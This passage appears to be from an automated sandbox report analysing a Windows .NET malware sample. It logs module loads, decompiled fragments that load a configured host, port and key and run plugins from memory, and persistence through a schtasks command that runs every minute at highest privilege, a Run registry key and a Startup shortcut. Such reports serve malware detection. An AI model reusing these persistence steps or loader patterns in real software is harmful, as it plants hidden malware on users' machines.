                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                  Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: apphelp.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: mscoree.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: kernel.appcore.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: version.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: vcruntime140_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: ucrtbase_clr0400.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: uxtheme.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: sspicli.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptsp.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: rsaenh.dll
                  Source: C:\Users\user\AppData\Roaming\localsys64.exeSection loaded: cryptbase.dll
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32Jump to behavior
                  Source: localsys64.lnk.0.drLNK file: ..\..\..\..\..\localsys64.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                  Source: fjijTlM2tu.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: fjijTlM2tu.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: fjijTlM2tu.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: fjijTlM2tu.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: localsys64.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: localsys64.exe.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                  .NET source code contains potential unpacker
                  Source: fjijTlM2tu.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: fjijTlM2tu.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: fjijTlM2tu.exe, Messages.cs.Net Code: Memory
                  Source: localsys64.exe.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: localsys64.exe.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: localsys64.exe.0.dr, Messages.cs.Net Code: Memory
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                  Source: 0.2.fjijTlM2tu.exe.12c69ac0.0.raw.unpack, Messages.cs.Net Code: Memory
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeCode function: 0_2_00007FFD9B8853F2 push ss; iretd 0_2_00007FFD9B885617
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeCode function: 0_2_00007FFD9B88244D push ebx; retf 0_2_00007FFD9B88246A
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeCode function: 0_2_00007FFD9B880708 push ss; iretd 0_2_00007FFD9B885617
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B79D2A5 pushad ; iretd 1_2_00007FFD9B79D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B868D push ebx; ret 1_2_00007FFD9B8B86EA
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B8B85FA push ebx; ret 1_2_00007FFD9B8B868A
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFD9B982316 push 8B485F91h; iretd 1_2_00007FFD9B98231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B76D2A5 pushad ; iretd 4_2_00007FFD9B76D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B88BB52 push E85B39D5h; ret 4_2_00007FFD9B88BCF9
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFD9B952316 push 8B485F94h; iretd 4_2_00007FFD9B95231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B76D2A5 pushad ; iretd 7_2_00007FFD9B76D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B957241 push eax; retf 7_2_00007FFD9B957242
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9B952316 push 8B485F94h; iretd 7_2_00007FFD9B95231B
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B77D2A5 pushad ; iretd 11_2_00007FFD9B77D2A6
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B9691C9 pushad ; ret 11_2_00007FFD9B9693F1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B962316 push 8B485F93h; iretd 11_2_00007FFD9B96231B
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile created: C:\Users\user\AppData\Roaming\localsys64.exeJump to dropped file

                  Boot Survival

                  barindex
                  Uses schtasks.exe or at.exe to add and modify task schedules
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "localsys64" /tr "C:\Users\user\AppData\Roaming\localsys64.exe"
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\localsys64.lnkJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\localsys64.lnkJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run localsys64Jump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run localsys64Jump to behavior

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Loading BitLocker PowerShell Module
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\fjijTlM2tu.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
